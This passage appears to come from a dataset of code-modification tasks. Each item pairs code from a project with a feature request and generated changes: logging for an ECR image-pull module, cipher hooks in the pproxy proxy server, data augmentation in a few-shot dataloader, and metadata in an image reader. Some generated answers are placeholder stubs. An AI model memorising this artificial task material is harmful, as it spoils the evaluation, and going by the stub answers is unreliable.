aws_session.client(\'ecr\')\n                token = ecr_client.get_authorization_token()\n        \n                docker_client = docker.DockerClient(base_url=DOCKER_BASE_URL)\n                docker_username, docker_password, docker_registry = get_docker_username_password_registry(token)\n                docker_login_response = docker_login(docker_client, docker_username, docker_password, docker_registry)\n    \n                if ecr_repos.get(\'repositories_by_region\'):\n                    for repo in ecr_repos.get(\'repositories_by_region\').get(region):\n                        if repo.get(\'repositoryUri\'):\n                            #Modify\n                            repo_uri = repo.get(\'repositoryUri\')\n                            logger.info(f\'Pulling repository: {repo_uri} from region: {region}\')\n                            docker_pull_response = docker_pull(docker_client, repo_uri)\n                            out = \'Pulled {}\'.format(docker_pull_response)\n                            count += 1\n                            print(out)\n\n        data[\'count\'] = count\n        #Modify\n        logger.info(f\'ECR pull all repos operation completed. Total repos pulled: {count}\')\n    except Exception as e:\n        #Modify\n        logger.error(f\'Error during ECR pull all repos operation: {str(e)}\')\n        print(e, file=sys.stderr)\n    \ndef ecr_pull(args, data):\n    #Modify\n    logger.info(\'Starting ECR pull single repo operation\')\n    logger.info(f\'Target repository URI: {args.get("aws_ecr_repository_uri")}\')\n    logger.info(f\'Target region: {args.get("aws_region")}\')\n    \n    try:\n        aws_session = get_aws_session(args[\'aws_cli_profile\'], args[\'aws_region\'])\n        ecr_client = aws_session.client(\'ecr\')\n        token = ecr_client.get_authorization_token()\n\n        docker_client = docker.DockerClient(base_url=DOCKER_BASE_URL)\n        docker_username, docker_password, docker_registry = get_docker_username_password_registry(token)\n        docker_login_response = docker_login(docker_client, docker_username, docker_password, docker_registry)\n\n        if DOCKER_LOGIN_SUCCEEDED == docker_login_response.get(\'Status\'):\n            #Modify\n            logger.info(\'Docker login succeeded\')\n            count = 0\n            for tag in args[\'aws_ecr_repository_tags\']:\n                repo_tag = args[\'aws_ecr_repository_uri\'] + ":" + tag\n                try:\n                    #Modify\n                    logger.info(f\'Pulling image with tag: {repo_tag}\')\n                    docker_pull_response = docker_pull(docker_client, repo_tag)\n                    out = \'Pulled {}\'.format(docker_pull_response)\n                    count += 1\n                    data[\'payload\'][\'aws_ecr_repository_tags\'].append(tag)\n                    #Modify\n                    logger.info(f\'Successfully pulled image: {repo_tag}\')\n                    print(out)\n                except Exception as e:\n                    #Modify\n                    logger.error(f\'Failed to pull image {repo_tag}: {str(e)}\')\n                    print(e, file=sys.stderr)\n\n            data[\'count\'] = count\n            data[\'payload\'][\'aws_ecr_repository_uri\'] = args[\'aws_ecr_repository_uri\']\n            data[\'payload\'][\'aws_region\'] = args[\'aws_region\']\n            #Modify\n            logger.info(f\'ECR pull operation completed. Total images pulled: {count}\')\n        else:\n            #Modify\n            logger.error(\'Docker login failed\')\n    except Exception as e:\n        #Modify\n        logger.error(f\'Error during ECR pull operation: {str(e)}\')\n        print(e, file=sys.stderr)\n\ndef main(args):\n    #Modify\n    logger.info(f\'ECR pull module invoked at {datetime.now().isoformat()}\')\n    logger.info(f\'AWS CLI Profile: {args.get("aws_cli_profile")}\')\n    \n    data = {\n        \'count\': 0,\n        \'payload\': {\n            \'aws_region\': None,\n            \'aws_ecr_repository_uri\': None,\n            \'aws_ecr_repository_tags\': []\n        }\n    }\n\n    if args.get(\'ecr_repos\'):\n        ecr_pull_all_repos(args, data)\n    else:\n        ecr_pull(args, data)\n\n    return data\n\ndef summary(data):\n    out = \'\'\n    out += \'{} ECR Repositories Pulled\\n\'.format(data[\'count\']) \n    out += \'ECR resources saved and use \\\'docker images\\\' command to check the result.\\n\'\n    return out\n\ndef set_args(aws_cli_profile, aws_region, aws_ecr_repository_uri, aws_ecr_repository_tags):\n    args = {\n        \'aws_cli_profile\': aws_cli_profile,\n        \'aws_region\': aws_region,\n        \'aws_ecr_repository_uri\': aws_ecr_repository_uri,\n        \'aws_ecr_repository_tags\': aws_ecr_repository_tags\n    }\n\n    return args\n\nif __name__ == "__main__":\n    print(\'Running module {}...\'.format(module_info[\'name\']))\n    \n    args = fire.Fire(set_args)\n    data = main(args)\n\n    if data is not None:\n        summary = summary(data)\n        if len(summary) &gt; 1000:\n            raise ValueError(\'The {} module\\\'s summary is too long ({} characters). Reduce it to 1000 characters or fewer.\'.format(module_info[\'name\'], len(summary)))\n        if not isinstance(summary, str):\n            raise TypeError(\' The {} module\\\'s summary is {}-type instead of str. Make summary return a string.\'.format(module_info[\'name\'], type(summary)))\n        \n        print(\'RESULT:\')\n        print(json.dumps(data, indent=4, default=str))        \n\n        print(\'{} completed.\\n\'.format(module_info[\'name\']))\n        print(\'MODULE SUMMARY:\\n\\n{}\\n\'.format(summary.strip(\'\\n\')))\n\n# FILE 2: ccat/ccat.py (relevant section)\n# Modify the run_module method in CLI class:\n\n#Modify\nelif PULL_ECR_REPOS in answers[\'main_menu\']:\n    cli_answers = self.extentions[\'aws\'].ask_ecr_pull_repos()\n    self.print_module_running(ecr__pull_repos.module_info[\'name\'])\n    #New - Add logging context\n    import logging\n    logger = logging.getLogger(\'ccat\')\n    logger.info(f\'Executing ECR pull with answers: {cli_answers}\')\n    data = ecr__pull_repos.main(cli_answers)\n    logger.info(f\'ECR pull completed with result: {data}\')\n    self.print_module_summary(data, ecr__pull_repos)'}</t>
  </si>
  <si>
    <t>{'#file 1': "#Modify\nimport sys\nimport fire\nimport boto3\nimport docker\nfrom modules.ecr__pull_repos.log_pull_activity import log_pull_activity  #New\n\n# ... (other code)\n\ndef main(args):\n    data  = {\n        'count': 0,\n        'payload': {\n            'aws_region': None,\n            'aws_ecr_repository_uri': None,\n            'aws_ecr_repository_tags': []\n        }\n    }\n\n    if args.get('ecr_repos'):\n        ecr_pull_all_repos(args, data)\n    else:\n        ecr_pull(args, data)\n\n    log_pull_activity(data)  #New\n    return data", '#file 2': "#Modify\nimport fire\nfrom pyfiglet import figlet_format\nfrom PyInquirer import prompt, Separator, style_from_dict, Token\nfrom tabulate import tabulate\nimport modules.ecr__pull_repos.main as ecr__pull_repos\nfrom modules.ecr__pull_repos.log_pull_activity import log_pull_activity  #New\n\n# ... (other code)\n\ndef run_module(self, answers):\n    # AWS\n    if PULL_ECR_REPOS in answers['main_menu']:\n        cli_answers = self.extentions['aws'].ask_ecr_pull_repos()\n        self.print_module_running(ecr__pull_repos.module_info['name'])\n        data = ecr__pull_repos.main(cli_answers)\n        log_pull_activity(data)  #New\n        self.print_module_summary(data, ecr__pull_repos)", '#file 3': '#New\ndef log_pull_activity(data):\n    with open(\'ecr_pull_log.txt\', \'a\') as log_file:\n        log_file.write(f"Pulled {data[\'count\']} repositories:\\n")\n        for tag in data[\'payload\'][\'aws_ecr_repository_tags\']:\n            log_file.write(f"- {tag}\\n")\n        log_file.write(\'\\n\')'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def main(args = None): ... loop.close()', 'invoking_code_segment': "if __name__ == '__main__': from .server import main; main()", 'feature_description': 'Add additional processing for ciphers to support cipher validation, initialization hooks, and post-processing callbacks during proxy server startup and connection handling', 'modified_complete_code': '# File 1: python-proxy/pproxy/server.py\n# Modify the prepare_ciphers function to add cipher processing hooks\nasync def prepare_ciphers(cipher, reader, writer, bind=None, server_side=True):\n    if cipher:\n        # #New - Add cipher validation hook\n        if hasattr(cipher, \'validate\'):\n            await cipher.validate()\n        \n        cipher.pdecrypt = cipher.pdecrypt2 = cipher.pencrypt = cipher.pencrypt2 = DUMMY\n        for plugin in cipher.plugins:\n            if server_side:\n                await plugin.init_server_data(reader, writer, cipher, bind)\n            else:\n                await plugin.init_client_data(reader, writer, cipher)\n            plugin.add_cipher(cipher)\n        \n        # #New - Add cipher post-initialization hook\n        if hasattr(cipher, \'post_init\'):\n            await cipher.post_init(server_side)\n        \n        return cipher(reader, writer, cipher.pdecrypt, cipher.pdecrypt2, cipher.pencrypt, cipher.pencrypt2)\n    else:\n        return None, None\n\n# #Modify - Update stream_handler to add cipher processing\nasync def stream_handler(reader, writer, unix, lbind, protos, rserver, cipher, sslserver, debug=0, authtime=86400*30, block=None, salgorithm=\'fa\', verbose=DUMMY, modstat=lambda u,r,h:lambda i:DUMMY, **kwargs):\n    try:\n        reader, writer = proto.sslwrap(reader, writer, sslserver, True, None, verbose)\n        if unix:\n            remote_ip, server_ip, remote_text = \'local\', None, \'unix_local\'\n        else:\n            peername = writer.get_extra_info(\'peername\')\n            remote_ip, remote_port, *_ = peername if peername else (\'unknow_remote_ip\',\'unknow_remote_port\')\n            server_ip = writer.get_extra_info(\'sockname\')[0]\n            remote_text = f\'{remote_ip}:{remote_port}\'\n        local_addr = None if server_ip in (\'127.0.0.1\', \'::1\', None) else (server_ip, 0)\n        \n        # #New - Add cipher connection hook\n        if cipher and hasattr(cipher, \'on_connection\'):\n            await cipher.on_connection(remote_ip, remote_port)\n        \n        reader_cipher, _ = await prepare_ciphers(cipher, reader, writer, server_side=False)\n        lproto, user, host_name, port, client_connected = await proto.accept(protos, reader=reader, writer=writer, authtable=AuthTable(remote_ip, authtime), reader_cipher=reader_cipher, sock=writer.get_extra_info(\'socket\'), **kwargs)\n        if host_name == \'echo\':\n            asyncio.ensure_future(lproto.channel(reader, writer, DUMMY, DUMMY))\n        elif host_name == \'empty\':\n            asyncio.ensure_future(lproto.channel(reader, writer, None, DUMMY))\n        elif block and block(host_name):\n            raise Exception(\'BLOCK \' + host_name)\n        else:\n            roption = schedule(rserver, salgorithm, host_name, port) or DIRECT\n            verbose(f\'{lproto.name} {remote_text}{roption.logtext(host_name, port)}\')\n            try:\n                reader_remote, writer_remote = await roption.open_connection(host_name, port, local_addr, lbind)\n            except asyncio.TimeoutError:\n                raise Exception(f\'Connection timeout {roption.bind}\')\n            try:\n                reader_remote, writer_remote = await roption.prepare_connection(reader_remote, writer_remote, host_name, port)\n                use_http = (await client_connected(writer_remote)) if client_connected else None\n            except Exception:\n                writer_remote.close()\n                raise Exception(\'Unknown remote protocol\')\n            m = modstat(user, remote_ip, host_name)\n            lchannel = lproto.http_channel if use_http else lproto.channel\n            asyncio.ensure_future(lproto.channel(reader_remote, writer, m(2+roption.direct), m(4+roption.direct)))\n            asyncio.ensure_future(lchannel(reader, writer_remote, m(roption.direct), roption.connection_change))\n    except Exception as ex:\n        if not isinstance(ex, asyncio.TimeoutError) and not str(ex).startswith(\'Connection closed\'):\n            verbose(f\'{str(ex) or "Unsupported protocol"} from {remote_ip}\')\n        try: writer.close()\n        except Exception: pass\n        if debug:\n            raise\n\n# #Modify - Update main function to add cipher initialization\ndef main(args = None):\n    parser = argparse.ArgumentParser(description=__description__+\'\\nSupported protocols: http,socks4,socks5,shadowsocks,shadowsocksr,redirect,pf,tunnel\', epilog=f\'Online help: &lt;{__url__}&gt;\')\n    parser.add_argument(\'-l\', dest=\'listen\', default=[], action=\'append\', type=proxies_by_uri, help=\'tcp server uri (default: http+socks4+socks5://:8080/)\')\n    parser.add_argument(\'-r\', dest=\'rserver\', default=[], action=\'append\', type=proxies_by_uri, help=\'tcp remote server uri (default: direct)\')\n    parser.add_argument(\'-ul\', dest=\'ulisten\', default=[], action=\'append\', type=proxies_by_uri, help=\'udp server setting uri (default: none)\')\n    parser.add_argument(\'-ur\', dest=\'urserver\', default=[], action=\'append\', type=proxies_by_uri, help=\'udp remote server uri (default: direct)\')\n    parser.add_argument(\'-b\', dest=\'block\', type=compile_rule, help=\'block regex rules\')\n    parser.add_argument(\'-a\', dest=\'alived\', default=0, type=int, help=\'interval to check remote alive (default: no check)\')\n    parser.add_argument(\'-s\', dest=\'salgorithm\', default=\'fa\', choices=(\'fa\', \'rr\', \'rc\', \'lc\'), help=\'scheduling algorithm (default: first_available)\')\n    parser.add_argument(\'-d\', dest=\'debug\', action=\'count\', help=\'turn on debug to see tracebacks (default: no debug)\')\n    parser.add_argument(\'-v\', dest=\'v\', action=\'count\', help=\'print verbose output\')\n    parser.add_argument(\'--ssl\', dest=\'sslfile\', help=\'certfile[,keyfile] if server listen in ssl mode\')\n    parser.add_argument(\'--pac\', help=\'http PAC path\')\n    parser.add_argument(\'--get\', dest=\'gets\', default=[], action=\'append\', help=\'http custom {path,file}\')\n    parser.add_argument(\'--auth\', dest=\'authtime\', type=int, default=86400*30, help=\'re-auth time interval for same ip (default: 86400*30)\')\n    parser.add_argument(\'--sys\', action=\'store_true\', help=\'change system proxy setting (mac, windows)\')\n    parser.add_argument(\'--reuse\', dest=\'ruport\', action=\'store_true\', help=\'set SO_REUSEPORT (Linux only)\')\n    parser.add_argument(\'--daemon\', dest=\'daemon\', action=\'store_true\', help=\'run as a daemon (Linux only)\')\n    parser.add_argument(\'--test\', help=\'test this url for all remote proxies and exit\')\n    parser.add_argument(\'--version\', action=\'version\', version=f\'%(prog)s {__version__}\')\n    args = parser.parse_args(args)\n    \n    # #New - Initialize cipher processing\n    def init_ciphers(proxies):\n        for proxy in proxies:\n            if hasattr(proxy, \'cipher\') and proxy.cipher and hasattr(proxy.cipher, \'initialize\'):\n                proxy.cipher.initialize()\n    \n    if args.sslfile:\n        sslfile = args.sslfile.split(\',\')\n        for context in sslcontexts:\n            context.load_cert_chain(*sslfile)\n    elif any(map(lambda o: o.sslclient or isinstance(o, ProxyQUIC), args.listen+args.ulisten)):\n        print(\'You must specify --ssl to listen in ssl mode\')\n        return\n    \n    # #New - Initialize ciphers for all proxies\n    init_ciphers(args.listen + args.ulisten + args.rserver)\n    \n    if args.test:\n        asyncio.get_event_loop().run_until_complete(test_url(args.test, args.rserver))\n        return\n    if not args.listen and not args.ulisten:\n        args.listen.append(proxies_by_uri(\'http+socks4+socks5://:8080/\'))\n    args.httpget = {}\n    if args.pac:\n        pactext = \'function FindProxyForURL(u,h){\' + (f\'var b=/^(:?{args.block.__self__.pattern})$/i;if(b.test(h))return "";\' if args.block else \'\')\n        for i, option in enumerate(args.rserver):\n            pactext += (f\'var m{i}=/^(:?{option.rule.__self__.pattern})$/i;if(m{i}.test(h))\' if option.rule else \'\') + \'return "PROXY %(host)s";\'\n        args.httpget[args.pac] = pactext+\'return "DIRECT";}\'\n        args.httpget[args.pac+\'/all\'] = \'function FindProxyForURL(u,h){return "PROXY %(host)s";}\'\n        args.httpget[args.pac+\'/none\'] = \'function FindProxyForURL(u,h){return "DIRECT";}\'\n    for gets in args.gets:\n        path, filename = gets.split(\',\', 1)\n        with open(filename, \'rb\') as f:\n            args.httpget[path] = f.read()\n    if args.daemon:\n        try:\n            __import__(\'daemon\').DaemonContext().open()\n        except ModuleNotFoundError:\n            print("Missing library: pip3 install python-daemon")\n            return\n    try:\n        __import__(\'uvloop\').install()\n        print(\'Using uvloop\')\n    except ModuleNotFoundError:\n        pass\n    loop = asyncio.get_event_loop()\n    if args.v:\n        from . import verbose\n        verbose.setup(loop, args)\n    servers = []\n    def print_fn(option, bind=None):\n        print(\'Serving on\', (bind or option.bind), \'by\', ",".join(i.name for i in option.protos) + (\'(SSL)\' if option.sslclient else \'\'), \'({}{})\'.format(option.cipher.name, \' \'+\',\'.join(i.name() for i in option.cipher.plugins) if option.cipher and option.cipher.plugins else \'\') if option.cipher else \'\')\n    for option in args.listen:\n        try:\n            server = loop.run_until_complete(option.start_server(vars(args)))\n            print_server_started(option, server, print_fn)\n            servers.append(server)\n        except Exception as ex:\n            print_fn(option)\n            print(\'Start server failed.\\n\\t==&gt;\', ex)\n    def print_fn(option, bind=None):\n        print(\'Serving on UDP\', (bind or option.bind), \'by\', ",".join(i.name for i in option.protos), f\'({option.cipher.name})\' if option.cipher else \'\')\n    for option in args.ulisten:\n        try:\n            server, protocol = loop.run_until_complete(option.udp_start_server(vars(args)))\n            print_server_started(option, server, print_fn)\n            servers.append(server)\n        except Exception as ex:\n            print_fn(option)\n            print(\'Start server failed.\\n\\t==&gt;\', ex)\n    def print_fn(option, bind=None):\n        print(\'Serving on\', (bind or option.bind), \'backward by\', ",".join(i.name for i in option.protos) + (\'(SSL)\' if option.sslclient else \'\'), \'({}{})\'.format(option.cipher.name, \' \'+\',\'.join(i.name() for i in option.cipher.plugins) if option.cipher and option.cipher.plugins else \'\') if option.cipher else \'\')\n    for option in args.rserver:\n        if isinstance(option, ProxyBackward):\n            try:\n                server = loop.run_until_complete(option.start_backward_client(vars(args)))\n                print_server_started(option, server, print_fn)\n                servers.append(server)\n            except Exception as ex:\n                print_fn(option)\n                print(\'Start server failed.\\n\\t==&gt;\', ex)\n    if servers:\n        if args.sys:\n            from . import sysproxy\n            args.sys = sysproxy.setup(args)\n        if args.alived &gt; 0 and args.rserver:\n            asyncio.ensure_future(check_server_alive(args.alived, args.rserver, args.verbose if args.v else DUMMY))\n        try:\n            loop.run_forever()\n        except KeyboardInterrupt:\n            print(\'exit\')\n        if args.sys:\n            args.sys.clear()\n    for task in asyncio.all_tasks(loop) if hasattr(asyncio, \'all_tasks\') else asyncio.Task.all_tasks():\n        task.cancel()\n    for server in servers:\n        server.close()\n    for server in servers:\n        if hasattr(server, \'wait_closed\'):\n            loop.run_until_complete(server.wait_closed())\n    loop.run_until_complete(loop.shutdown_asyncgens())\n    loop.close()\n\nif __name__ == \'__main__\':\n    main()\n\n# File 2: python-proxy/pproxy/__main__.py\n# #Modify - Enhanced main invocation with cipher processing\nif __name__ == \'__main__\':\n    from .server import main\n    # #New - Call main with cipher processing support\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'async def prepare_ciphers(cipher, reader, writer, bind=None, server_side=True):\n    if cipher:\n        cipher.pdecrypt = cipher.pdecrypt2 = cipher.pencrypt = cipher.pencrypt2 = DUMMY\n        for plugin in cipher.plugins:\n            if server_side:\n                await plugin.init_server_data(reader, writer, cipher, bind)\n            else:\n                await plugin.init_client_data(reader, writer, cipher)\n            plugin.add_cipher(cipher)\n        #Modify: Invoke additional cipher processing\n        cipher = await additional_cipher_processing(cipher, reader, writer, bind, server_side)\n        return cipher(reader, writer, cipher.pdecrypt, cipher.pdecrypt2, cipher.pencrypt, cipher.pencrypt2)\n    else:\n        return None, None', '#file 2': "async def stream_handler(reader, writer, unix, lbind, protos, rserver, cipher, sslserver, debug=0, authtime=86400*30, block=None, salgorithm='fa', verbose=0, modstat=lambda u,r,h:lambda i:DUMMY, **kwargs):\n    try:\n        reader, writer = proto.sslwrap(reader, writer, sslserver, True, None, verbose)\n        if unix:\n            remote_ip, server_ip, remote_text = 'local', None, 'unix_local'\n        else:\n            peername = writer.get_extra_info('peername')\n            remote_ip, remote_port, *_ = peername if peername else ('unknow_remote_ip','unknow_remote_port')\n            server_ip = writer.get_extra_info('sockname')[0]\n            remote_text = f'{remote_ip}:{remote_port}'\n        local_addr = None if server_ip in ('127.0.0.1', '::1', None) else (server_ip, 0)\n        reader_cipher, _ = await prepare_ciphers(cipher, reader, writer, server_side=False)", '#file 3': 'async def additional_cipher_processing(cipher, reader, writer, bind=None, server_side=True):\n    if cipher:\n        # Additional processing logic for ciphers\n        cipher.additional_processing = True\n        return cipher\n    else:\n        return None, None'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class LowShotDataloader():\n    def __init__(self, dataset_train_novel, dataset_evaluation, nExemplars=1, batch_size=1, num_workers=4):\n        # ... initialization code ...\n    \n    def create_examples_tensor_data(self, examples):\n        images = torch.stack([self.dataset_train_novel[img_idx][0] for img_idx, _ in examples], dim=0)\n        labels = torch.LongTensor([label for _, label in examples])\n        return images, labels\n    \n    def sample_training_data_for_novel_categories(self, exp_id=0):\n        nKnovel = self.nKnovel\n        nKbase = self.nKbase\n        random.seed(exp_id)\n        train_examples = self.sample_training_examples_for_novel_categories(self.Knovel, self.nExemplars, nKbase)\n        Kall = torch.LongTensor(self.Kall)\n        images_train, labels_train = self.create_examples_tensor_data(train_examples)\n        return images_train, labels_train, Kall, nKbase, nKnovel', 'invoking_code_segment': "nExemplars = data_train_opt = config['data_train_opt']['nExemplars']\neval_phase = 'test' if args_opt.testset else 'val'\n\nfeat_data_train = ImageNetLowShotFeatures(data_dir=config['data_dir'], image_split='train', phase=eval_phase)\nfeat_data_test = ImageNetLowShotFeatures(data_dir=config['data_dir'], image_split='val', phase=eval_phase)\ndata_loader = LowShotDataloader(feat_data_train, feat_data_test, nExemplars=nExemplars, batch_size=26000, num_workers=1)\n\nfor exp_id in range(args_opt.num_exp):\n    nove_cat_data = data_loader.sample_training_data_for_novel_categories(exp_id=exp_id)\n    algorithm.add_novel_categories(nove_cat_data)", 'feature_description': 'Add data augmentation to the training data for novel categories by implementing augmentation transforms in the LowShotDataloader class and applying them during the creation of training examples tensor data.', 'modified_complete_code': '# File 1: FewShotWithoutForgetting/dataloader.py - Modified LowShotDataloader class\n\nclass LowShotDataloader():\n    def __init__(\n        self,\n        dataset_train_novel,\n        dataset_evaluation,\n        nExemplars=1,\n        batch_size=1,\n        num_workers=4,\n        #New: add_augmentation=False\n        add_augmentation=False):\n\n        self.nExemplars = nExemplars\n        self.batch_size = batch_size\n        self.num_workers = num_workers\n        self.dataset_train_novel = dataset_train_novel\n        self.dataset_evaluation = dataset_evaluation\n        #New: store augmentation flag\n        self.add_augmentation = add_augmentation\n\n        assert(self.dataset_evaluation.labelIds_novel ==\n               self.dataset_train_novel.labelIds_novel)\n\n        assert(self.dataset_evaluation.labelIds_base ==\n               self.dataset_train_novel.labelIds_base)\n\n        assert(self.dataset_evaluation.base_classes_eval_split ==\n               self.dataset_train_novel.base_classes_eval_split)\n\n        self.nKnovel = self.dataset_evaluation.num_cats_novel\n        self.nKbase = self.dataset_evaluation.num_cats_base\n\n        self.Kbase = sorted(self.dataset_evaluation.labelIds_base)\n        assert(self.nKbase == len(self.Kbase))\n        self.Knovel = sorted(self.dataset_evaluation.labelIds_novel)\n        assert(self.nKnovel == len(self.Knovel))\n\n        self.Kall = self.Kbase + self.Knovel\n\n        self.CategoryId2LabelIndex = {\n            category_id: label_index for label_index, category_id in enumerate(self.Kall)\n        }\n        self.Kbase_eval_split = self.dataset_train_novel.base_classes_eval_split\n\n        Kbase_set = set(self.Kall[:self.nKbase])\n        Kbase_eval_split_set = set(self.Kbase_eval_split)\n        assert(len(set.intersection(Kbase_set, Kbase_eval_split_set)) == len(Kbase_eval_split_set))\n\n        self.base_eval_split_labels = sorted(\n            [self.CategoryId2LabelIndex[category_id] for category_id in self.Kbase_eval_split]\n        )\n\n        data_indices = []\n        for category_id in self.Kbase_eval_split:\n            data_indices += self.dataset_evaluation.label2ind[category_id]\n        for category_id in self.Knovel:\n            data_indices += self.dataset_evaluation.label2ind[category_id]\n        self.eval_data_indices = sorted(data_indices)\n        self.epoch_size = len(self.eval_data_indices)\n\n    #New: Add augmentation transform method\n    def _apply_augmentation(self, image):\n        """Apply data augmentation to a single image tensor."""\n        if not self.add_augmentation:\n            return image\n        \n        # Apply random horizontal flip\n        if torch.rand(1).item() &gt; 0.5:\n            image = torch.flip(image, dims=[-1])\n        \n        # Apply random color jittering\n        brightness_factor = 1.0 + torch.randn(1).item() * 0.2\n        contrast_factor = 1.0 + torch.randn(1).item() * 0.2\n        image = torch.clamp(image * brightness_factor, 0, 1)\n        image = torch.clamp((image - 0.5) * contrast_factor + 0.5, 0, 1)\n        \n        return image\n\n    def base_category_label_indices(self):\n        return self.base_eval_split_labels\n\n    def novel_category_label_indices(self):\n        return range(self.nKbase, len(self.Kall))\n\n    def sampleImageIdsFrom(self, cat_id, sample_size=1):\n        assert(cat_id in self.dataset_train_novel.label2ind)\n        assert(len(self.dataset_train_novel.label2ind[cat_id]) &gt;= sample_size)\n        return random.sample(self.dataset_train_novel.label2ind[cat_id], sample_size)\n\n    def sample_training_examples_for_novel_categories(\n        self, Knovel, nExemplars, nKbase):\n        Exemplars = []\n        for knovel_idx, knovel_label in enumerate(Knovel):\n            imds = self.sampleImageIdsFrom(knovel_label, sample_size=nExemplars)\n            Exemplars += [(img_id, nKbase + knovel_idx) for img_id in imds]\n        random.shuffle(Exemplars)\n        return Exemplars\n\n    #Modify: Update create_examples_tensor_data to apply augmentation\n    def create_examples_tensor_data(self, examples):\n        """\n        Creates the examples image and label tensor data.\n        Applies data augmentation to training examples if enabled.\n        """\n        images_list = []\n        for img_idx, _ in examples:\n            img = self.dataset_train_novel[img_idx][0]\n            #New: Apply augmentation if enabled\n            if self.add_augmentation:\n                img = self._apply_augmentation(img)\n            images_list.append(img)\n        \n        images = torch.stack(images_list, dim=0)\n        labels = torch.LongTensor([label for _, label in examples])\n        return images, labels\n\n    def sample_training_data_for_novel_categories(self, exp_id=0):\n        nKnovel = self.nKnovel\n        nKbase = self.nKbase\n        random.seed(exp_id)\n        train_examples = self.sample_training_examples_for_novel_categories(\n            self.Knovel, self.nExemplars, nKbase)\n        Kall = torch.LongTensor(self.Kall)\n        images_train, labels_train = self.create_examples_tensor_data(\n            train_examples)\n        return images_train, labels_train, Kall, nKbase, nKnovel\n\n    def get_iterator(self, epoch=0):\n        def load_fun_(idx):\n            img_idx = self.eval_data_indices[idx]\n            img, category_id = self.dataset_evaluation[img_idx]\n            label = (self.CategoryId2LabelIndex[category_id]\n                     if (category_id in self.CategoryId2LabelIndex) else -1)\n            return img, label\n\n        tnt_dataset = tnt.dataset.ListDataset(\n            elem_list=range(self.epoch_size), load=load_fun_)\n        data_loader = tnt_dataset.parallel(\n            batch_size=self.batch_size, num_workers=self.num_workers,\n            shuffle=False, drop_last=False)\n        return data_loader\n\n    def __call__(self, epoch=0):\n        return self.get_iterator(epoch)\n\n    def __len__(self):\n        return int(math.ceil(float(self.epoch_size)/self.batch_size))\n\n\n# File 2: FewShotWithoutForgetting/lowshot_evaluate.py - Modified instantiation\n\n#Modify: Add augmentation parameter when creating LowShotDataloader\ndata_loader = LowShotDataloader(\n    feat_data_train, feat_data_test,\n    nExemplars=nExemplars, batch_size=26000, num_workers=1,\n    #New: enable data augmentation for novel categories\n    add_augmentation=True)'}</t>
  </si>
  <si>
    <t>```python
# file 1: dataloader.py
# Modify for modified parts
def sample_training_data_for_novel_categories(self, exp_id=0):
    nKnovel = self.nKnovel
    nKbase = self.nKbase
    random.seed(exp_id) # fix the seed for this experiment.
    # Sample `nExemplars` number of training examples per novel category.
    train_examples = self.sample_training_examples_for_novel_categories(
        self.Knovel, self.nExemplars, nKbase)
    Kall = torch.LongTensor(self.Kall)
    images_train, labels_train = self.create_examples_tensor_data(
        train_examples)
    # New for newly added parts
    from new_feature import augment_training_data
    images_train, labels_train, Kall, nKbase, nKnovel = augment_training_data(
        images_train, labels_train, Kall, nKbase, nKnovel)
    return images_train, labels_train, Kall, nKbase, nKnovel
```
```python
# file 2: lowshot_evaluate.py
# Modify for modified parts
nove_cat_data = data_loader.sample_training_data_for_novel_categories(
    exp_id=exp_id)
# Feed the training data of the novel categories to the algorithm.
algorithm.add_novel_categories(nove_cat_data)
# Evaluate on the validation images of ImageNet.
results_this = algorithm.evaluate_model_on_test_images(
    data_loader=data_loader,
    base_classes=data_loader.base_category_label_indices(),
    novel_classes=data_loader.novel_category_label_indices(),
    exp_id='Exp_id = ' + str(exp_id),
    prior_m=args_opt.prior)
results.append(results_this)
```
```python
# file 3: new_feature.py
# New for newly added parts
def augment_training_data(images_train, labels_train, Kall, nKbase, nKnovel):
    # Implement data augmentation logic here
    augmented_images = []
    augmented_labels = []
    for img, label in zip(images_train, labels_train):
        # Example augmentation: flip horizontally
        augmented_img = torch.flip(img, [2])
        augmented_images.append(augmented_img)
        augmented_labels.append(label)
    # Combine original and augmented data
    images_train = torch.stack(list(images_train) + augmented_images)
    labels_train = torch.cat((labels_train, torch.LongTensor(augmented_labels)))
    return images_train, labels_train, Kall, nKbase, nKnovel
```</t>
  </si>
  <si>
    <t>{'called_code_segment': "def read_image(path, witdh):\n    I = Image.open(path).convert('RGB')\n    transform = get_transform(witdh)\n    return transform(I).unsqueeze(0)", 'invoking_code_segment': 'A = util.read_image(source_path, opt.imageSize)\nB = util.read_image(opt.target, opt.imageSize)', 'feature_description': 'Add metadata to the image reading process to track image source path, dimensions, and loading timestamp', 'modified_complete_code': '# File 1: rewriting/baselines/neural_best_buddies/util/util.py\nfrom __future__ import print_function\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport scipy.io\nfrom PIL import Image\nimport inspect, re\nimport numpy as np\nimport os\nimport math\nfrom PIL import Image\nimport torchvision.transforms as transforms\nimport collections\n#New\nimport datetime\n\n# Converts a Tensor into a Numpy array\n# |imtype|: the desired type of the converted numpy array\n#Modify\ndef read_image(path, witdh):\n    I = Image.open(path).convert(\'RGB\')\n    transform = get_transform(witdh)\n    tensor = transform(I).unsqueeze(0)\n    #New\n    metadata = {\n        \'source_path\': path,\n        \'dimensions\': (I.width, I.height),\n        \'timestamp\': datetime.datetime.now().isoformat(),\n        \'tensor_shape\': tuple(tensor.shape)\n    }\n    return tensor, metadata\n\n#New\ndef read_image_with_metadata(path, witdh):\n    tensor, metadata = read_image(path, witdh)\n    return tensor, metadata\n\ndef get_transform(witdh):\n    transform_list = []\n    osize = [witdh, witdh]\n    transform_list.append(transforms.Scale(osize, Image.BICUBIC))\n    transform_list += [transforms.ToTensor(),\n                       transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                            std=[0.229, 0.224, 0.225])]\n    return transforms.Compose(transform_list)\n\ndef save_final_image(image, name, save_dir):\n    im_numpy = tensor2im(image)\n    save_image(im_numpy, os.path.join(save_dir, name + \'.png\'))\n\ndef save_map_image(map_values, name, save_dir, level=0, binary_color=False):\n    if level == 0:\n        map_values = map_values\n    else:\n        scale_factor = int(math.pow(2,level-1))\n        map_values = upsample_map(map_values, scale_factor)\n    if binary_color==True:\n        map_image = binary2color_image(map_values)\n    else:\n        map_image = map2image(map_values)\n    save_image(map_image, os.path.join(save_dir, name + \'.png\'))\n\ndef upsample_map(map_values, scale_factor, mode=\'nearest\'):\n    if scale_factor == 1:\n        return map_values\n    else:\n        upsampler = torch.nn.Upsample(scale_factor=scale_factor, mode=mode)\n        return 